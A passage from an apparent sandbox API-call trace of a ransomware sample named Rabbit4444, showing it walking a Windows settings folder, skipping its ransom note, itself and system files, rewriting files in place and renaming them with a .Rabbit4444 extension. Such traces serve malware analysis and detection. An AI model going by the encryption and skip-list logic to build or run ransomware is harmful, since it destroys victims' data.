(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyLocation.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacylocation.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.794] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.794] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14810475252) returned 1 [0056.794] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.794] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.794] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.794] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.795] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.796] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.796] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14810726223) returned 1 [0056.797] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.797] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.797] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.797] CloseHandle (hObject=0x298) returned 1 [0056.797] CloseHandle (hObject=0x278) returned 1 [0056.797] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyLocation.settingcontent-ms.Rabbit4444") returned 177 [0056.797] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyLocation.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacylocation.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyLocation.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacylocation.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.798] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4f7f93, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xb4f7f93, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", cAlternateFileName="AA8919~1.SET")) returned 1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2=".") returned 1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="..") returned 1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="windows") returned -1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="boot") returned -1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.798] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.798] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyMessaging.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyMessaging.settingcontent-ms") returned="AAA_SettingsPagePrivacyMessaging.settingcontent-ms" [0056.798] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMessaging.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.798] lstrlenW (lpString="AAA_SettingsPagePrivacyMessaging.settingcontent-ms") returned 50 [0056.798] lstrlenW (lpString="Rabbit4444") returned 10 [0056.798] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.798] lstrlenW (lpString=".dll") returned 4 [0056.798] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.798] lstrlenW (lpString=".lnk") returned 4 [0056.798] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.799] lstrlenW (lpString=".ini") returned 4 [0056.799] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.799] lstrlenW (lpString=".sys") returned 4 [0056.799] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.799] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMessaging.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymessaging.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.799] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.799] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14810965029) returned 1 [0056.799] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1087) returned 1 [0056.799] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0056.799] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.799] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.800] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.801] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14811225320) returned 1 [0056.802] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0056.802] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.802] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.802] CloseHandle (hObject=0x298) returned 1 [0056.802] CloseHandle (hObject=0x278) returned 1 [0056.802] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMessaging.settingcontent-ms.Rabbit4444") returned 178 [0056.802] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMessaging.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymessaging.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMessaging.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymessaging.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.803] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ca31e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc7ca31e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", cAlternateFileName="AAE799~1.SET")) returned 1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2=".") returned 1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="..") returned 1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="windows") returned -1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="boot") returned -1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.803] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.803] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms") returned="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms" [0056.803] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.803] lstrlenW (lpString="AAA_SettingsPagePrivacyMicrophone.settingcontent-ms") returned 51 [0056.803] lstrlenW (lpString="Rabbit4444") returned 10 [0056.803] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.803] lstrlenW (lpString=".dll") returned 4 [0056.803] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.803] lstrlenW (lpString=".lnk") returned 4 [0056.803] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.803] lstrlenW (lpString=".ini") returned 4 [0056.803] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.803] lstrlenW (lpString=".sys") returned 4 [0056.804] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymicrophone.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.804] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.804] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14811456776) returned 1 [0056.804] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0056.804] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.804] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0056.804] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.805] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.806] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14811705806) returned 1 [0056.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0056.806] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.807] CloseHandle (hObject=0x298) returned 1 [0056.807] CloseHandle (hObject=0x278) returned 1 [0056.807] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms.Rabbit4444") returned 179 [0056.807] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymicrophone.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMicrophone.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymicrophone.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.807] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef14ca, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xcef14ca, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", cAlternateFileName="AAF2F8~1.SET")) returned 1 [0056.807] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.807] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.807] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.807] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2=".") returned 1 [0056.808] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="..") returned 1 [0056.808] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="windows") returned -1 [0056.808] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.808] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.808] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="boot") returned -1 [0056.808] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.808] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.808] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPagePrivacyMotionData.settingcontent-ms" | out: lpString1="AAA_SettingsPagePrivacyMotionData.settingcontent-ms") returned="AAA_SettingsPagePrivacyMotionData.settingcontent-ms" [0056.808] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMotionData.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.808] lstrlenW (lpString="AAA_SettingsPagePrivacyMotionData.settingcontent-ms") returned 51 [0056.808] lstrlenW (lpString="Rabbit4444") returned 10 [0056.808] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.808] lstrlenW (lpString=".dll") returned 4 [0056.808] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.808] lstrlenW (lpString=".lnk") returned 4 [0056.808] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.808] lstrlenW (lpString=".ini") returned 4 [0056.808] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.808] lstrlenW (lpString=".sys") returned 4 [0056.808] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.808] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMotionData.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymotiondata.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.809] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.809] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14811932250) returned 1 [0056.809] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0056.809] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0056.809] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0056.809] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.810] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0056.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0056.811] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14812177828) returned 1 [0056.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0056.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0056.811] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.811] CloseHandle (hObject=0x298) returned 1 [0056.811] CloseHandle (hObject=0x278) returned 1 [0056.811] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMotionData.settingcontent-ms.Rabbit4444") returned 179 [0056.811] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMotionData.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymotiondata.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyMotionData.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacymotiondata.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.824] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4e721a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4e721a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", cAlternateFileName="AACED3~1.SET")) returned 1 [0056.824] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2=".") returned 1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="..") returned 1 [0056.825] lstrcmpiW (lpString1="AAA_SettingsPagePrivacyPersonalization.settingcontent-ms", lpString2="windows") returned -1 [0056.825] 